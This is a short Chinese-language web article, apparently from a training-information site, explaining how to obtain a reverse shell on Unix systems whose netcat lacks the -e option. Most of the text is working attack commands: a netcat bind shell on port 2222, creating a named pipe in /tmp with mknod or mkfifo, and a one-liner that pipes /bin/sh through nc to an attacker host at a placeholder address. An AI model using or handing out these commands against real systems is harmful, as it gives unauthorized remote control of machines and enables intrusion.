Unix系統(tǒng)NC反彈shell的方法
來源:易賢網 閱讀:2724 次 日期:2016-08-03 15:51:58
溫馨提示:易賢網小編為您整理了“Unix系統(tǒng)NC反彈shell的方法”,方便廣大網友查閱!

Unix系統(tǒng)自帶NC,但是為了安全,一般不會編譯-e選項,也就無法反彈shell。但是可以變換一下思路,不直接使用NC反彈shell,而是反彈一個擁有shell權限的管道。

NC的原生做法:

nc -l -vv -p 2222 -e /bin/bash

無法使用NC反彈的時候可以這樣

先在tmp創(chuàng)建一個普通管道

mknod /tmp/backpipe p

或者

mkfifo /tmp/backpipe p

然后管道一邊接入shell,一變用NC反彈到攻擊者主機x.x.x.x

/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe

名單

PS:攻防的對抗一直在思路的轉變之間,將原有思路逆轉,可能收獲不一樣的東西!

更多信息請查看技術文章
易賢網手機網站地址:Unix系統(tǒng)NC反彈shell的方法
關于我們 | 聯系我們 | 人才招聘 | 網站聲明 | 網站幫助 | 非正式的簡要咨詢 | 簡要咨詢須知 | 加入群交流 | 手機站點 | 投訴建議
工業(yè)和信息化部備案號:滇ICP備2023014141號-1 云南省教育廳備案號:云教ICP備0901021 滇公網安備53010202001879號 人力資源服務許可證:(云)人服證字(2023)第0102001523號
聯系電話:0871-65317125(9:00—18:00) 獲取招聘考試信息及咨詢關注公眾號:hfpxwx
咨詢QQ:526150442(9:00—18:00)版權所有:易賢網